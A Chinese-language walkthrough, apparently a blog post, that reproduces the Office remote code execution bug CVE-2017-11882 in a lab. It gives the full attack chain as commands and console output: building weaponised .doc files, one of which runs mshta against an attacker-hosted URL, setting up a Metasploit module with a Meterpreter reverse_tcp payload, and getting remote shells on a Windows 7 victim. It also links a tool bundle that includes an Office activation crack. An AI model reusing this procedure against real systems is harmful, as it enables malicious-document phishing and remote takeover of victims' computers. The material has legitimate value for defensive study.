CVE-2017-11882漏洞 Msf利用復現

中午時候收到了推送的漏洞預警，在網上搜索相關信息看到不少大牛已經開發出生成doc文檔的腳本和msf的poc，本文記錄CVE-2017-11882 漏洞在 Msf下的利用。

 

0x00 漏洞簡介

2017年11月14日，微軟發佈了11月份的安全補丁更新，其中比較引人關注的莫過於悄然修復了潛伏17年之久的Office遠程代碼執行漏洞（CVE-2017-11882）。該漏洞爲Office內存破壞漏洞，影響目前流行的全部Office版本。攻擊者能夠利用漏洞以當前登陸的用戶的身份執行任意命令。 因爲漏洞影響面較廣，漏洞披露後，金睛安全研究團隊持續對漏洞相關攻擊事件進行關注。11月19日，監控到了已有漏洞POC在網上流傳，隨即迅速對相關樣本進行了分析。目前該樣本全球僅微軟殺毒能夠檢測。

• 漏洞影響版本：
• Office 365
• Microsoft Office 2000
• Microsoft Office 2003
• Microsoft Office 2007 Service Pack 3
• Microsoft Office 2010 Service Pack 2
• Microsoft Office 2013 Service Pack 1
• Microsoft Office 2016

 

 

 

0x01 利用工具清單：

a) tcp反彈：kali 172.16.253.76 

b) 安裝office2013的系統：win7 172.16.253.4

 

1. Msf 用到的 Poc

2. office201三、激活工具

3. win7旗艦版ISO鏡像

以上工具已經打包好，下載地址：

連接:http://pan.baidu.com/s/1o8635Om  密碼:xl91

 

0x02 利用過程

1. 生成doc

#安裝啓動nginx
[root@ihoneysec ~]# yum -y install nginx
[root@ihoneysec ～]# cd /usr/share/nginx/html/   
[root@ihoneysec html]# systemctl start nginx

#下載生成doc的python腳本
[root@ihoneysec ~]# git clone https://github.com/Ridter/CVE-2017-11882.git
[root@ihoneysec ~]# cd CVE-2017-11882/
[root@ihoneysec CVE-2017-11882]# ls
Command109b_CVE-2017-11882.py  Command43b_CVE-2017-11882.py  example  README.md

#生成測試doc
[root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc
[*] Done ! output file --> cve.doc
[root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

#生成msf利用的doc
[root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "mshta http://172.16.253.76:8080/abc" -o cve2.doc
[*] Done ! output file --> cve2.doc
[root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

#放到網站根目錄
[root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/
404.html  50x.html  cve.doc  cve2.doc  index.html  nginx-logo.png  poweredby.png

　　

2. 測試正常彈出calc.exe計算器

 

3. kali msf配置Poc：

root@kali:~# cd /
# 將下載好的漏洞模塊放在msf任意目錄下
root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
# 檢查ip地址
root@kali:/mnt/hgfs/kalishare# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
        inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
        RX packets 3136  bytes 987402 (964.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 255  bytes 20912 (20.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
# 啓動postgresql服務，打開msf
root@kali:/mnt/hgfs/kalishare# service postgresql start  
root@kali:/mnt/hgfs/kalishare# msfconsole 
                                                  
...

       =[ metasploit v4.16.6-dev                          ]
+ -- --=[ 1683 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
# 搜索cve_2017_11882 漏洞模塊
msf > search cve_2017_11882
Matching Modules
================
   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   exploit/windows/smb/cve_2017_11882                   normal  Microsoft Office Payload Delivery

# 使用該模塊
msf > use exploit/windows/smb/cve_2017_11882 
# 設置payload爲反彈tcp
msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
# 設置本機ip
msf exploit(cve_2017_11882) > set lhost 172.16.253.76
lhost => 172.16.253.76
# 設置uri的路徑，要與第一步生成doc時配置一致
msf exploit(cve_2017_11882) > set URIPATH abc
URIPATH => abc
# 檢查當前配置
msf exploit(cve_2017_11882) > show options

Module options (exploit/windows/smb/cve_2017_11882):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  abc              no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.253.76    yes       The listen address
   LPORT     4444             yes       The listen port

...

# 啓動利用後，msf會監聽本機8080端口，若是win7機器打開doc觸發訪問172.16.253.76:8080/abc就會獲得反彈到4444端口的tcp會話
msf exploit(cve_2017_11882) > exploit 
[*] Exploit running as background job 0.
# 開始監聽
[*] Started reverse TCP handler on 172.16.253.76:4444 
msf exploit(cve_2017_11882) > [*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://172.16.253.76:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://172.16.253.76:8080/abc"
msf exploit(cve_2017_11882) > [*] 172.16.253.4     cve_2017_11882 - Delivering payload
[*] Sending stage (179267 bytes) to 172.16.253.4 #收到反彈tcp鏈接
[*] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800
[*] 172.16.253.4     cve_2017_11882 - Delivering payload
[*] Sending stage (179267 bytes) to 172.16.253.4
[*] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

msf exploit(cve_2017_11882) >
msf exploit(cve_2017_11882) >
msf exploit(cve_2017_11882) > sessions 
# 查看已經創建的反彈會話
Active sessions
===============

  Id  Type                     Information             Connection
  --  ----                     -----------             ----------
  1   meterpreter x86/windows  win7-PC\win7 @ WIN7-PC  172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4)
# 進入id爲1的會話
msf exploit(cve_2017_11882) > sessions -i 1
[*] Starting interaction with 1...
# 驗證獲得反彈鏈接是不是win7機器ip
meterpreter > ipconfig

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:72:2e:7d
MTU          : 1500
IPv4 Address : 172.16.253.4
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::c15d:3813:94ec:d6c8
IPv6 Netmask : ffff:ffff:ffff:ffff::

......
# 進入命令模式
meterpreter > shell
Process 2924 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
# 查看當前系統用戶、主機名
C:\Windows\system32>net user
net user

\\WIN7-PC ���û��ʻ�

-------------------------------------------------------------------------------
Administrator            Guest                    win7                     
�����ɹ����ɡ�


C:\Windows\system32>